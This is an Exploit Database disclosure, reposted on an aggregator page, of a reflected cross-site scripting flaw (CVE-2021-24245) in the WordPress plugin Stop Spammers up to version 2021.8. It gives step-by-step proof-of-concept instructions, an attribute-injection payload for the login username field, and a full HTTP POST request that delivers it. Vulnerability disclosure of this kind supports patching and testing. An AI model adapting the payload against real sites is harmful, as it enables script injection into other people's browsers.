WordPress Plugin Stop Spammers 2021.8 – ‘log’ Reflected Cross-site Scripting (XSS)

• Exploit Database
• 13 阅读

• 作者： Hosein Vita
  日期： 2021-05-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49880/

• # Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
  # Date: 04/08/2021
  # Exploit Author: Hosein Vita
  # Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
  # Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
  # Version: <= 2021.8
  # Tested on: Windows-Ubuntu
  # CVE : CVE-2021-24245
  
  Summary:
  
  Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
  
  Proof of concepts:
  
  1-Install "Stop Spammers <= 2021.8" in your wordpress website
  2-For testing remove your IP address from the allowed list
  3-Go to http://<YOUR-WEBSITE>/wp-admin
  4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
  #Notice the `ad` keyword must be in your payload!
  5-Press Alt + Shift + X to trigger Xss
  #Tested on Firefox
  
  Request POC:
  
  POST /wp-login.php HTTP/1.1
  Host: localhost
  Connection: close
  Content-Length: 161
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: wordpress_test_cookie=WP+Cookie+check;
  
  log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1